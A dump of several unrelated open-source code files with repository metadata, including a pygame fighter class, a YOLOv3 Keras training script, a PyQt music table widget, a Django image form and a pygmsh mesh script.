if (self.jumpCounter < self.jumpHeight -1 or self.jumpCounter > self.jumpHeight +1): # subindo ou descendo
self.frame_jumping = 1
if (self.jumpHeight - 1 <= self.jumpCounter <= self.jumpHeight + 1): # quase parado
self.frame_jumping = 2
if (self.jumpCounter == 2*self.jumpHeight-1):
self.frame_jumping = 0
self.jumpCounter = -1
if clock() > nextFrame:
self.setSprite(self.spriteList[self.jump])
changeSpriteImage(self.spriteList[self.jump], self.frame_jumping)
moveSprite(self.spriteList[self.jump], self.x, self.y, True)
self.end_jump = self.setState()# MUDANÇA
self.jumping = self.setEndState() #MUDANÇA
self.jumpCounter += 2
nextFrame += 1*frame_step
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
tick(120)
return nextFrame
def getX(self):
return self.x
def getY(self):
return self.y
def setX(self,X):
self.x = X
moveSprite(self.curr_sprite,self.x,self.y,True)
def setY(self,Y):
self.y = Y
moveSprite(self.curr_sprite,self.x,self.y,True)
def isWalking(self):
return self.walking
def isCrouching(self):
return self.crouching
def isDancing(self):
return self.dancing
def isApunching(self):
return self.Apunching
def isBpunching(self):
return self.Bpunching
def isCpunching(self):
return self.Cpunching
def isDpunching(self):
return self.Dpunching
def isAkicking(self):
return self.Akicking
def isBkicking(self):
return self.Bkicking
def isCkicking(self):
return self.Ckicking
def isDkicking(self):
return self.Dkicking
def isAblocking(self):
return self.Ablocking
def isHit(self):
return self.hit
def killPlayer(self):
for i in range(0,len(self.spriteList)):
killSprite(self.spriteList[i])
def currentSprite(self):
return self.curr_sprite
def takeHit(self,by):
self.hit = True
self.hitName = by
def takeDownHit(self,by):
self.downHit = True
print("flag")
self.hitName = by
def stopHit(self):
self.hit = False
self.hitName = ""
def setState(self):
# moves
self.walking = False
self.dancing = False
self.jumping = False
self.crouching = False
# punches
self.Apunching = False
self.Bpunching = False
self.Cpunching = False
self.Dpunching = False
# kicks
self.Akicking = False
self.Bkicking = False
self.Ckicking = False
self.Dkicking = False
# punch hits
self.Ahitting = False
self.Bhitting = False
self.Chitting = False
self.Dhitting = False
self.Ehitting = False
self.Fhitting = False
self.Ghitting = False
self.Hhitting = False
# blocks
self.Ablocking = False
self.Bblocking = False
# special move
self.specialMove = False
# fatality
self.fatality = False
# actual states
return True
def setEndState(self):
self.end_jump = True
self.end_Apunch = True
self.end_Bpunch = True
self.end_Cpunch = True
self.end_Dpunch = True
self.end_Akick = True
self.end_Bkick = True
self.end_Ckick = True
self.end_Dkick = True
self.end_special = True
return False
def setSprite(self,sprite):
for i in range(0,len(self.spriteList)):
if (not sprite == self.spriteList[i]):
hideSprite(self.spriteList[i])
showSprite(sprite)
def posFighter(self):
for i in range(0,len(self.spriteList)):
moveSprite(self.spriteList[i], self.x, self.y, True) | [
"matheusvidaldemenezes@gmail.com"
] | matheusvidaldemenezes@gmail.com |
169f65f33b732b562e5b9cf615068dbd751fd4ed | f39c2c500873180d953ab9a7b22a4f6df95fb1c3 | /Bloomberg/Design Underground System.py | 314a6c31b7b94a5f58dc9fbfad3485ba36f8756c | [] | no_license | Jason003/interview | 458516f671d7da0d3585f89b098c5370edcd9f04 | e153306b85c3687b23a332812a0885d25ecce904 | refs/heads/master | 2021-07-15T15:28:07.175276 | 2021-02-05T03:21:59 | 2021-02-05T03:21:59 | 224,898,150 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,406 | py | '''
经典地铁题,原题解法就不说了,地里也有很多资源。 主要讲下follow up。
国女问了哪些edge case可以导致error, 我说了两种,一是check out的时候id在map中不存在,
二是check out的时候id对应的时间t大于之前之前check in时的时间。国女表示满意,
又问了运行过程中可能出现哪些情况导致地铁出问题。我说可能有些check in了但是把地铁卡弄丢了没有checkout,
id在memory中积压了很多最后导致memory不够。 解决方法是定期检查已经存储的数据,
如果start time间隔很久的就可以直接remove。
三哥也问了一个follow up,因为我在check out的map里存的是route, 如果之后需要该站点名怎么办。
我说在route里可以用station id,然后单独建一个station name到station id的map,三哥表示满意。
'''
import collections
class UndergroundSystem:
def __init__(self):
self.station_time, self.user = collections.defaultdict(list), {}
def checkIn(self, id, stationName, t):
self.user[id] = (stationName, t)
def checkOut(self, id, stationName, t):
self.station_time[self.user[id][0], stationName].append(t - self.user[id][1])
def getAverageTime(self, startStation, endStation):
return sum(self.station_time[startStation, endStation]) / len(self.station_time[startStation, endStation]) | [
"jiefanli97@gmail.com"
] | jiefanli97@gmail.com |
ff684e6ace834d561fb4e69b2849d0dc69da0f9d | 1f07fa171b2407c436baedf7c791af0d6dbcdb68 | /train.py | 84eddb2b5149887e5f2bc036824640f7f5572f3f | [
"MIT"
] | permissive | xiaobingchan/yolov3-keras | 9c17c60ec777d82810decbcfd835bd25e9dded9b | 1649846297811d066d2f857ab0eb0dbb247f67e3 | refs/heads/master | 2023-05-04T17:04:30.742544 | 2021-05-17T01:24:09 | 2021-05-17T01:24:09 | 367,919,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,375 | py | """
Retrain the YOLO model for your own dataset.
"""
import numpy as np
import keras.backend as K
from keras.layers import Input, Lambda
from keras.models import Model
from keras.optimizers import Adam
from keras.callbacks import TensorBoard, ModelCheckpoint, ReduceLROnPlateau, EarlyStopping
from yolo3.model import preprocess_true_boxes, yolo_body, tiny_yolo_body, yolo_loss
from yolo3.utils import get_random_data
def _main():
annotation_path = 'train.txt'
log_dir = 'logs/000/'
classes_path = 'model_data/voc_classes.txt'
anchors_path = 'model_data/yolo_anchors.txt'
class_names = get_classes(classes_path)
num_classes = len(class_names)
print("num_classes:"+str(num_classes))
anchors = get_anchors(anchors_path)
input_shape = (416,416) # multiple of 32, hw
is_tiny_version = len(anchors)==6 # default setting
if is_tiny_version:
model = create_tiny_model(input_shape, anchors, num_classes,
freeze_body=2, weights_path='model_data/tiny_yolo_weights.h5')
else:
model = create_model(input_shape, anchors, num_classes,
freeze_body=2, weights_path='model_data/yolo_weights.h5') # make sure you know what you freeze
logging = TensorBoard(log_dir=log_dir)
checkpoint = ModelCheckpoint(log_dir + 'ep{epoch:03d}-loss{loss:.3f}-val_loss{val_loss:.3f}.h5',
monitor='val_loss', save_weights_only=True, save_best_only=True, period=3)
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=3, verbose=1)
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=10, verbose=1)
val_split = 0.1
with open(annotation_path) as f:
lines = f.readlines()
np.random.seed(10101)
np.random.shuffle(lines)
np.random.seed(None)
num_val = int(len(lines)*val_split)
num_train = len(lines) - num_val
# Train with frozen layers first, to get a stable loss.
# Adjust num epochs to your dataset. This step is enough to obtain a not bad model.
if True:
model.compile(optimizer=Adam(lr=1e-3), loss={
# use custom yolo_loss Lambda layer.
'yolo_loss': lambda y_true, y_pred: y_pred})
batch_size = 32
print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
model.fit_generator(data_generator_wrapper(lines[:num_train], batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train//batch_size),
validation_data=data_generator_wrapper(lines[num_train:], batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, num_val//batch_size),
epochs=50,
initial_epoch=0,
callbacks=[logging, checkpoint])
model.save_weights(log_dir + 'trained_weights_stage_1.h5')
# Unfreeze and continue training, to fine-tune.
# Train longer if the result is not good.
if True:
for i in range(len(model.layers)):
model.layers[i].trainable = True
model.compile(optimizer=Adam(lr=1e-4), loss={'yolo_loss': lambda y_true, y_pred: y_pred}) # recompile to apply the change
print('Unfreeze all of the layers.')
batch_size = 32 # note that more GPU memory is required after unfreezing the body
print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
model.fit_generator(data_generator_wrapper(lines[:num_train], batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train//batch_size),
validation_data=data_generator_wrapper(lines[num_train:], batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, num_val//batch_size),
epochs=100,
initial_epoch=50,
callbacks=[logging, checkpoint, reduce_lr, early_stopping])
model.save_weights(log_dir + 'trained_weights_final.h5')
# Further training if needed.
def get_classes(classes_path):
'''loads the classes'''
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def get_anchors(anchors_path):
'''loads the anchors from a file'''
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def create_model(input_shape, anchors, num_classes, load_pretrained=True, freeze_body=2,
weights_path='model_data/yolo_weights.h5'):
'''create the training model'''
K.clear_session() # get a new session
image_input = Input(shape=(None, None, 3))
h, w = input_shape
num_anchors = len(anchors)
y_true = [Input(shape=(h//{0:32, 1:16, 2:8}[l], w//{0:32, 1:16, 2:8}[l], \
num_anchors//3, num_classes+5)) for l in range(3)]
model_body = yolo_body(image_input, num_anchors//3, num_classes)
print('Create YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))
if load_pretrained:
model_body.load_weights(weights_path, by_name=True, skip_mismatch=True)
print('Load weights {}.'.format(weights_path))
if freeze_body in [1, 2]:
# Freeze darknet53 body or freeze all but 3 output layers.
num = (185, len(model_body.layers)-3)[freeze_body-1]
for i in range(num): model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.5})(
[*model_body.output, *y_true])
model = Model([model_body.input, *y_true], model_loss)
return model
def create_tiny_model(input_shape, anchors, num_classes, load_pretrained=True, freeze_body=2,
weights_path='model_data/tiny_yolo_weights.h5'):
'''create the training model, for Tiny YOLOv3'''
K.clear_session() # get a new session
image_input = Input(shape=(None, None, 3))
h, w = input_shape
num_anchors = len(anchors)
y_true = [Input(shape=(h//{0:32, 1:16}[l], w//{0:32, 1:16}[l], \
num_anchors//2, num_classes+5)) for l in range(2)]
model_body = tiny_yolo_body(image_input, num_anchors//2, num_classes)
print('Create Tiny YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))
if load_pretrained:
model_body.load_weights(weights_path, by_name=True, skip_mismatch=True)
print('Load weights {}.'.format(weights_path))
if freeze_body in [1, 2]:
# Freeze the darknet body or freeze all but 2 output layers.
num = (20, len(model_body.layers)-2)[freeze_body-1]
for i in range(num): model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.7})(
[*model_body.output, *y_true])
model = Model([model_body.input, *y_true], model_loss)
return model
def data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes):
'''data generator for fit_generator'''
n = len(annotation_lines)
i = 0
while True:
image_data = []
box_data = []
for b in range(batch_size):
if i==0:
np.random.shuffle(annotation_lines)
image, box = get_random_data(annotation_lines[i], input_shape, random=True)
image_data.append(image)
box_data.append(box)
i = (i+1) % n
image_data = np.array(image_data)
box_data = np.array(box_data)
y_true = preprocess_true_boxes(box_data, input_shape, anchors, num_classes)
yield [image_data, *y_true], np.zeros(batch_size)
def data_generator_wrapper(annotation_lines, batch_size, input_shape, anchors, num_classes):
n = len(annotation_lines)
if n==0 or batch_size<=0: return None
return data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes)
if __name__ == '__main__':
_main()
| [
"you@example.com"
] | you@example.com |
d46a46d06171563485050b9203c957d38c0d0829 | 9f2445e9a00cc34eebcf3d3f60124d0388dcb613 | /2019-11-13-kineticfeatures/hhfitting_minimize_all.py | 65943f142fdd8a7ddda864998cb0f6a72011bff9 | [] | no_license | analkumar2/Thesis-work | 7ee916d71f04a60afbd117325df588908518b7d2 | 75905427c2a78a101b4eed2c27a955867c04465c | refs/heads/master | 2022-01-02T02:33:35.864896 | 2021-12-18T03:34:04 | 2021-12-18T03:34:04 | 201,130,673 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,359 | py | #exec(open('hhfitting_minimize.py').read())
#Using fmin
import h5py
import numpy as np
import matplotlib.pyplot as plt
import os
from scipy import signal
from scipy.optimize import minimize
from scipy.optimize import curve_fit
from scipy.optimize import Bounds
# We do it for cell rCell10070.nwb
# Take from 993 to 5987 idx which is 100.3ms to 599.7ms
# First we extract the trace, then fit individual trace and then in a loop collect for all inf and tau values.
# In another file we check if the model also fits to the deactivation traces.
levelnum = 13
reader = h5py.File('../../Raw_data/Channelpedia/Kv1.1/DataKv1.1RatCHO/rCell10070.nwb')
data = reader['acquisition']['timeseries']['Activation']['repetitions']['repetition2']['data']
leak = np.mean(data[993:5987,4]*1e-9)
G = (np.transpose(data[993:5987,:])*1e-9 - np.transpose(leak))/(np.arange(-0.090,0.090,0.010)+0.0962)[:,None]
Gnorm = G/np.max(G)
t = np.arange(0,len(Gnorm[levelnum])/10000,1/10000)
# plt.figure(1)
# plt.plot(np.transpose(G))
# plt.figure(2)
# plt.plot(data[993:5987,4:15])
# plt.show()
def kineticfunc_array(minfV, mtauV, hinfV, htauV, min, hin, mpow, hpow):
#Assuming that at time=0, the channel is at steady state at -80mV.
m = minfV + (min-minfV)*np.exp(-t/mtauV)
h = hinfV + (hin-hinfV)*np.exp(-t/htauV)
return m**mpow*h**hpow
def error(x):
minfV, mtauV, hinfV, htauV = x
min, hin, mpow, hpow = 0,1,1,1
return np.sum((kineticfunc_array(minfV, mtauV, hinfV, htauV, min, hin, mpow, hpow) - Gnorm[levelnum])**2)
bounds = Bounds([0,0.00001,0,0.0001],[1,1,1,1])
#bb = [(0,100e-8),(0.1),(1e-5,1),(0,1),(1e-4,1)]
# minimum = minimize(error, [3,1,0.005,0.05,0.050,0,1,1,1], method='L-BFGS-B', bounds=bounds)
# minimum = minimize(error, [3,1,0.005,0.05,0.050,0,1,1,1], method='TNC', bounds=bounds)
# minimum = minimize(error, [1,0.005,0.05,0.050,0,1], method='Nelder-Mead', bounds=bounds)
# minimum = minimize(error, [5e-8,1,0.0005,0.25,0.1], method='trust-constr', bounds=bounds)
for level in np.arange(-0.040,0.060,0.010):
levelnum = int((level+0.060)/0.010)
minimum = minimize(error, [1,0.005,0.05,0.050], method='Nelder-Mead', bounds=bounds)
print(minimum.x)
plt.plot(t,Gnorm[levelnum])
plt.plot(t,kineticfunc_array(*minimum.x, *[0,1,1,1]))
# plt.plot(t,kineticfunc_array(*[10e-8,1,0.0005,0.25,0.1], *[0,1,1,1]))
plt.show()
| [
"analkumar2@gmail.com"
] | analkumar2@gmail.com |
2b51bb93386e0ac1b6f86ceadeaa9b0d86f1bacf | e7b6364245adec14cc47cbe5f2206afcba81d734 | /main/models.py | 8cc8cc3d931e5710e1e23fd46cacecd70d4e3f28 | [] | no_license | anaf007/myapp | 255cd3476fe05f9e063c96c3dc535e7089cf317f | 90e2da4a4e0ec1d10620609cfa59f58a78fed08b | refs/heads/master | 2020-03-24T05:14:03.174477 | 2018-08-02T09:33:30 | 2018-08-02T09:33:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | from main.extensions import login_manager
from main.user.models import User
@login_manager.user_loader
def load_user(user_id):
"""Load user by ID."""
return User.get_by_id(int(user_id)) | [
"anaf@163.com"
] | anaf@163.com |
81c8562b87597fa5954ae5a0d9f29bf0e1dc7a0c | b7cb4d7a14b4d15741ca18c7d6159f2e755e49ff | /pysurrogate/util/usage.py | 59a844e65cf5b88dad879e7ee0d08d1e95a0d576 | [
"MIT"
] | permissive | mberkanbicer/pysurrogate | eb270099d452602d41368ae08f0e70d03b945018 | 6fe58f157920ef7819bcd4756342b2ca778f43b8 | refs/heads/master | 2023-03-16T00:46:11.221702 | 2018-09-12T18:26:53 | 2018-09-12T18:26:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,723 | py | import numpy as np
import matplotlib.pyplot as plt
from pysurrogate.optimize import fit, predict
if __name__ == '__main__':
# number of samples we will use for this example
n_samples = 20
# ---------------------------------------------------------
# Example 1: One input variable and one target
# ---------------------------------------------------------
X = np.random.rand(n_samples, 1) * 4 * np.pi
Y = np.cos(X)
# fit the model and predict the data
model = fit(X, Y, n_folds=3, disp=True, normalize_X=True, normalize_Y=True)
_X = np.linspace(0, 4 * np.pi, 1000)
_Y = predict(model, _X)
plt.scatter(X, Y, label="Observations")
plt.plot(_X, _Y, label="True")
plt.show()
# ---------------------------------------------------------
# Example 2: Two input variables and two targets.
# Normalize before building the model and use only an RBF implementation with a specific kernel
# Finally validate the model error on the true function.
# ---------------------------------------------------------
X = (np.random.rand(n_samples, 2) * 200) + 500
func_eval = lambda X: np.concatenate([np.sum(np.square(X), axis=1)[:, None], np.sum(np.sqrt(X), axis=1)[:, None]], axis=1)
Y = func_eval(X)
# fit the model and predict the data
model = fit(X, Y, n_folds=3, disp=True, normalize_X=True, normalize_Y=True)
# create two dimensional data to test the
M = np.meshgrid(np.linspace(100, 200, 1000), np.linspace(100, 200, 1000))
_X = np.concatenate([X[:, :, None] for e in X], axis=2).reshape(n_samples * n_samples, 2)
_Y = predict(model, _X)
print(np.mean(np.abs(_Y - func_eval(_X)), axis=0))
| [
"jules89@arcor.de"
] | jules89@arcor.de |
6ce2efa1815bfbcb8520ef0ef62c4d9a19a81325 | 46e9fc0fc20a58026d35a163c7201f1b40844ce8 | /src/widgets/music_table_widget.py | cc86686d7da19ee6e19240dc84ed25d9aaa756ad | [
"MIT"
] | permissive | kiragoo/FeelUOwn | c47d09bd8f1ee6200ebd5c8a0de30e5b6f403d22 | 07b88b452af873f1596a1cbf551a21ffc940cb94 | refs/heads/master | 2021-05-29T23:25:51.556985 | 2015-08-05T09:14:33 | 2015-08-05T09:14:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,877 | py | # -*- coding:utf8 -*-
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from base.logger import LOG
class MusicTableWidget(QTableWidget):
"""显示音乐信息的tablewidget
"""
signal_play_music = pyqtSignal([int], name='play_music')
signal_remove_music_from_list = pyqtSignal([int], name='remove_music_from_list')
def __init__(self, rows=0, columns=5, parent=None):
super().__init__(rows, columns, parent)
self.__row_mid_map = [] # row 为 index, mid为值
self.__special_focus_out = False
self.__signal_mapper = QSignalMapper() # 把remove_music按钮和mid关联起来
self.__set_prop()
self.__init_signal_binding()
def __set_objects_name(self):
pass
def __init_signal_binding(self):
self.cellDoubleClicked.connect(self.on_cell_double_clicked)
self.cellClicked.connect(self.on_remove_music_btn_clicked)
def __set_prop(self):
self.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
self.horizontalHeader().setDefaultAlignment(Qt.AlignLeft)
self.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setHorizontalHeaderLabels([u'歌曲名',
u'歌手',
u'专辑名',
u'时长'])
self.setShowGrid(False) # item 之间的 border
self.setMouseTracking(True)
self.setFocusPolicy(Qt.StrongFocus)
self.setWindowFlags(Qt.FramelessWindowHint)
self.setAlternatingRowColors(True)
def focusOutEvent(self, event):
self.close()
def add_item_from_model(self, music_model):
if self.is_item_already_in(music_model['id']) is not False: # is
return False
artist_name = ''
music_item = QTableWidgetItem(music_model['name'])
album_item = QTableWidgetItem(music_model['album']['name'])
if len(music_model['artists']) > 0:
artist_name = music_model['artists'][0]['name']
artist_item = QTableWidgetItem(artist_name)
duration = music_model['duration']
m = int(duration / 60000)
s = int((duration % 60000) / 1000)
duration = str(m) + ':' + str(s)
duration_item = QTableWidgetItem(duration)
music_item.setData(Qt.UserRole, music_model)
row = self.rowCount()
self.setRowCount(row + 1)
self.setItem(row, 0, music_item)
self.setItem(row, 1, artist_item)
self.setItem(row, 2, album_item)
self.setItem(row, 3, duration_item)
btn = QLabel()
btn.setToolTip(u'从当前播放列表中移除')
btn.setObjectName('remove_music') # 为了应用QSS,不知道这种实现好不好
self.setCellWidget(row, 4, btn)
# btn.clicked.connect(self.__signal_mapper.map)
# self.__signal_mapper.setMapping(btn, music_model['id'])
# self.__signal_mapper.mapped.connect(self.on_remove_music_btn_clicked)
self.setRowHeight(row, 30)
self.setColumnWidth(4, 30)
row_mid = dict()
row_mid['mid'] = music_model['id']
row_mid['row'] = row
return True
def set_songs(self, tracks):
self.setRowCount(0)
for track in tracks:
self.add_item_from_model(track)
def is_item_already_in(self, mid):
row = self.find_row_by_mid(mid)
if row is not None:
return row
return False
def focus_cell_by_mid(self, mid):
row = self.find_row_by_mid(mid)
self.setCurrentCell(row, 0)
self.setCurrentItem(self.item(row, 0))
self.scrollToItem(self.item(row, 0))
def find_row_by_mid(self, mid):
row = False
total = self.rowCount()
i = 0
while i < total:
item = self.item(i, 0)
data = item.data(Qt.UserRole)
tmp_mid = data['id']
if tmp_mid == mid:
row = i
break
i += 1
return row
def find_mid_by_row(self, row):
item = self.item(row, 0)
data = item.data(Qt.UserRole)
mid = data['mid']
return mid
@pyqtSlot(int, int)
def on_cell_double_clicked(self, row, column):
item = self.item(row, 0)
music_model = item.data(Qt.UserRole)
self.signal_play_music.emit(music_model['id'])
@pyqtSlot(int, int)
def on_remove_music_btn_clicked(self, row, column):
if column != 4:
return
item = self.item(row, 0)
data = item.data(Qt.UserRole)
mid = data['id']
row = self.find_row_by_mid(mid)
self.removeRow(row)
self.signal_remove_music_from_list.emit(mid) | [
"yinshaowen241@gmail.com"
] | yinshaowen241@gmail.com |
8784fdd39fd7940c5323ecb33a5d20bc0be6b2c1 | 4160b450b052830e17457a0412e29414f67caea5 | /goods/apps.py | 42618868a73474215ce8f280268254282c223de0 | [] | no_license | mnogoruk/fastcustoms | 6ad7b058607ddf4d2b56a09e23e66fcfb43be1a7 | 4c3bf7f9f1d4af2851f957a084b6adc2b7b7f681 | refs/heads/master | 2023-08-23T15:54:08.415613 | 2021-10-31T12:21:29 | 2021-10-31T12:21:29 | 372,066,847 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | from django.apps import AppConfig
class CargoConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'goods'
| [
"lionless072@gmail.com"
] | lionless072@gmail.com |
2e18bb631907b32d1f4cdde82bdb2a57e871174f | 746a9c1f65674cd5bcdce6dbd1971b6a16345f9d | /images/forms.py | dd89b8853a27fc1fdb599041349f517c15c147a7 | [] | no_license | mazulo/bookmarks | 4dc25dc09772663c65698d3cc9f5b653fd409ba9 | 5c2ce3c3ad811466c63f7b0f3a21bf33a6a28f5e | refs/heads/master | 2021-01-10T07:23:37.185414 | 2016-03-23T06:40:53 | 2016-03-23T05:40:53 | 54,158,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,305 | py | from urllib import request
from django import forms
from django.core.files.base import ContentFile
from django.utils.text import slugify
from .models import Image
class ImageCreateForm(forms.ModelForm):
class Meta:
model = Image
fields = ('title', 'url', 'description')
widgets = {
'url': forms.HiddenInput,
}
def clean_url(self):
url = self.cleaned_data['url']
valid_extensions = ['jpg', 'jpeg']
extension = url.rsplit('.', 1)[1].lower()
if extension not in valid_extensions:
raise forms.ValidationError(
'The given URL does not match valid image extensions.'
)
return url
def save(self, force_insert=False, force_update=False, commit=True):
image = super(ImageCreateForm, self).save(commit=False)
image_url = self.cleaned_data['url']
image_name = '{}.{}'.format(
slugify(image.title),
image_url.rsplit('.', 1)[1].lower()
)
# download image from the given URL
response = request.urlopen(image_url)
image.image.save(
image_name,
ContentFile(response.read()),
save=False
)
if commit:
image.save()
return image
| [
"pmazulo@gmail.com"
] | pmazulo@gmail.com |
846a5e2ab2a378670c30bbbbae0fcf1e5f6f4070 | 23fddc940a266c2d1d0e0b1687c36cdbcc9d54d9 | /test/unittest/line_up/line_up_test.py | adc7a590bbb62f34cfffe5488ea14b34016d80ec | [] | no_license | Cuick/traversing | 210fcfb1c780037de59343fffeb4fa4d3f2eae32 | c78982580af7f63c8bff4dcb37005b7f7c682b5b | refs/heads/master | 2021-01-10T17:38:37.899460 | 2016-11-18T06:06:55 | 2016-11-18T06:06:55 | 55,397,540 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 770 | py | # -*- coding:utf-8 -*-
"""
created by server on 14-7-14下午6:12.
"""
from test.unittest.base.base_test_case import BaseTestCase
import unittest
class LineUpTest(BaseTestCase):
"""test heros_component and hero"""
def test_add_hero(self):
line_up_component = self.player.line_up_component
line_up_component.change_hero(2, 10001, 1)
def test_hero_link(self):
line_up_slot = self.player.line_up_component.line_up_slots.get(2)
hero_slot = line_up_slot.hero_slot
self.NotEqual(hero_slot.link_skill_ids, [])
def test_set_equip(self):
line_up_slot = self.player.line_up_component.line_up_slots.get(2)
self.NotEqual(line_up_slot.set_equ_skill_ids, [])
if __name__ == '__main__':
unittest.main()
| [
"zxzxck@163.com"
] | zxzxck@163.com |
8b92a7c9c58837640882ba3dee0dcaebc67d62bf | 2383bf5a3b58e468d65713c361718795d51f1b97 | /python/call_test.py | 99c1f81aec4011b55d157f082bfafc64cf379f12 | [
"MIT"
] | permissive | rec/test | 3f4fb6614729ebc72d130888a8a9bc550f92988c | a260b9bf7fea96867e64163d3c891c2e2091f636 | refs/heads/master | 2023-08-03T13:49:24.347294 | 2023-07-28T09:19:39 | 2023-07-28T09:19:39 | 65,399,133 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | class Call1(object):
def __call__(self, x):
return x
class Call2(object):
def __init__(self):
self.call = lambda x: x
def __call__(self, x):
return self.call(x)
class Call3(object):
def __init__(self):
self.__call__ = lambda x: x
print(Call1()(3))
print(Call2()(3))
print(Call3()(3))
| [
"tom@swirly.com"
] | tom@swirly.com |
55048821cc9cb29b98bdf0c56f5b9d6d22ccaed8 | 0a9949a7dbe5f7d70028b22779b3821c62eb6510 | /static/statistic_struct/user portrait_0430/dynamic_analysis/code_test.py | f774cc12c9f529669c7813a4082b3099290f2e91 | [] | no_license | 744996162/warehouse | ed34f251addb9438a783945b6eed5eabe18ef5a2 | 3efd299a59a0703a1a092c58a6f7dc2564b92e4d | refs/heads/master | 2020-06-04T22:10:14.727156 | 2015-07-03T09:40:09 | 2015-07-03T09:40:09 | 35,603,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 162 | py | #ecoding=utf-8
__author__ = 'Administrator'
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
str = '\xe5\x88\xb0\xe8\xbe\xbe'
print(str.encode("utf-8")) | [
"744996162@qq.com"
] | 744996162@qq.com |
d1c9d99e2b1639d463275d911bda31fdb8d8aea9 | ce8ffe238c510f8a80b42aa897ab0ce29698445d | /finfet_ex/finfet/moscap3d.py | 5ccc6333cfd4fa29bd590093e3f9a7177e40537e | [] | no_license | devsim/devsim_misc | 4d29d58314f29cb08939c3580fee24f441f55b50 | 9a3c7056e0e3e7fc49e17031a706573350292d4d | refs/heads/main | 2022-07-20T21:08:08.780498 | 2022-06-27T02:22:11 | 2022-06-27T02:22:11 | 191,487,676 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,331 | py |
import pygmsh
import bool_common
geom = pygmsh.opencascade.Geometry(
#characteristic_length_min=.1,
#characteristic_length_max=2.5e-5
)
w=1
h=1
tox=3
tsi=60
xrf=-0.1
trf=3
l_contact=1
#tcl0=0.5 #cl in ox
#tcl1=0.05 #cl near interface
#tcl2=0.5
#tcl3=0.5 #cl near backside
lcar=0.3
lrf=0.1
gate=bool_common.create_box_volume(geom, h=h, w=w, l=l_contact, x=-tox-l_contact, z=0, lcar=lcar)
ox=bool_common.create_box_volume(geom, h=h, w=w, l=tox, x=-tox, z=0, lcar=lcar)
#rf=bool_common.create_box_volume(geom, h=h, w=w, l=trf, x=0, z=0, lcar=lcar)
si=bool_common.create_box_volume(geom, h=h, w=w, l=tsi, x=0, z=0, lcar=lcar)
sub=bool_common.create_box_volume(geom, h=h, w=w, l=l_contact, x=tsi, z=0, lcar=lcar)
all_volumes=[ox, si, gate, sub]
geom.boolean_fragments( all_volumes,[], delete_first=True, delete_other=False)
#['gate', 'sub', 'interface']
#['oxide', 'silicon']
geom.add_physical_volume(gate, 'gate')
geom.add_physical_volume(sub, 'sub')
geom.add_physical_volume(ox, 'ox')
geom.add_physical_volume(si, 'si')
# TODO: add refinement box
#
mydict = {
"lrf" : lrf,
"lcar" : lcar,
"trf" : trf,
"xrf" : xrf,
"w" : w,
"h" : h,
}
with open('moscap3d.geo', 'w') as ofh:
ofh.write('''\
// This option may be important for background mesh
//Mesh.CharacteristicLengthExtendFromBoundary=0; /* do not extend from boundary points */
//Mesh.Algorithm3D=1 /* 1 is Delaunay, Tetgen */
//Mesh.CharacteristicLengthMax = 1; /*maximum characteristic length */
//Mesh.CharacteristicLengthMin = 0; /*maximum characteristic length */
//Mesh.CharacteristicLengthFromCurvature = 1
//Mesh.CharacteristicLengthFromPoints = 1
//Mesh.CharacteristicLengthExtendFromBoundary=0;
//Geometry.ScalingFactor=1.0e-7;
//Mesh.CharacteristicLengthMax = 2.5e-5; /*maximum characteristic length */
''')
ofh.write(geom.get_code())
ofh.write("\n")
ofh.write('''
Field[1] = Box;
Field[1].VIn = %(lrf)s;
Field[1].VOut = %(lcar)s;
Field[1].XMin = %(xrf)s;
Field[1].XMax = %(trf)s+%(xrf)s;
Field[1].YMin = -0.5*%(h)s;
Field[1].YMax = +0.5*%(h)s;
Field[1].ZMin = 0;
Field[1].ZMax = %(w)s;
Background Field = 1;
Mesh.CharacteristicLengthExtendFromBoundary = 1;
Mesh.CharacteristicLengthFromPoints = 1;
Mesh.CharacteristicLengthMax = %(lcar)s; /*maximum characteristic length */
''' % mydict)
# ofh.write("Coherence;\n")
| [
